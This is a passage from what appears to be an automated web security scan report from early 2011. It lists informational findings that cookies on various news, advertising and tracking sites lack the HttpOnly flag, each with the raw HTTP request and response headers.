Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=79jE^0^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=79jE^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:37:55 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0


17.143. http://digitalnature.ro/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digitalnature.ro
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: digitalnature.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...

17.144. http://digitalnature.ro/projects/fusion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digitalnature.ro
Path:   /projects/fusion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/fusion HTTP/1.1
Host: digitalnature.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:08:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/
Location: http://digitalnature.ro/projects/fusion/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


17.145. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1860849269@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 171
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<!-- Segment Pixel ... Farmers_Brand_Exposed - DO NOT MODIFY -->
<img src="http://ib.adnxs.com/seg?add=81825&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->

17.146. http://domdex.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=163&k=keyword+targeting,paid+inclusion,paid+placement,ppc,pay+per+click,cpc,pay+for+placement,pay+for+ranking,kanoodle,bid+for+location,cost+per+click,pay+for+performance,trusted+feed,deep+web,invisible+web,xml+feed,search+engine+marketing,search,search+engine,search+engine+keyword+discovery,sponsored+links HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dex=1; k=mass+texting-107-1296236614_

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, no-cache
Set-Cookie: k=keyword+targeting%2Cpaid+inclusion%2Cpaid+placement%2Cppc%2Cpay+per+click%2Ccpc%2Cpay+for+placement%2Cpay+for+ranking%2Ckanoodle%2Cbid+for+location%2Ccost+per+click%2Cpay+for+performance%2Ctrusted+feed%2Cdeep+web%2Cinvisible+web%2Cxml+feed%2Csearch+engine+marketing%2Csearch%2Csearch+engine%2Csearch+engine+keyword+discovery%2Csponsored+links-163-1296399205.mass+texting-107-1296236614_; expires=Sat, 30-Apr-2011 14:53:25 GMT
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


17.147. http://earthsky.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://earthsky.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: earthsky.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 02:08:12 GMT
X-Pingback: http://earthsky.org/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-nollkmcj=4EAA623C76FDF55310FACF40BC17B580; path=/
Content-Length: 50113


<!DOCTYPE HTML>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>EarthSky.org - A Clear Voice for Science</title>

<link rel='stylesheet' id='pret
...[SNIP]...

17.148. http://editorial.autos.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.149. http://editorial.autos.redacted/articles/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /articles/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.150. http://editorial.autos.redacted/blogs/autosblog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.151. http://editorial.autos.redacted/media/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /media/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.152. http://editorial.autos.redacted/media/video/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /media/video/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...

17.153. http://editorial.autos.redacted/new-cars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /new-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.154. http://editorial.autos.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /slideshow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.155. http://editorial.autos.redacted/used-cars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /used-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.156. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine2.adzerk.net
Path:   /z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2200
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

17.157. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine2.adzerk.net
Path:   /z/8277/adzerk2_2_17_45

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/8277/adzerk2_2_17_45 HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
Content-Length: 1497
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

17.158. http://entertainment.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 51392
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...

17.159. http://entertainment.redacted/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Just In Ne
...[SNIP]...

17.160. http://entertainment.redacted/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Entert
...[SNIP]...

17.161. http://expression.microsoft.com/en-us/cc136530.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expression.microsoft.com
Path:   /en-us/cc136530.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
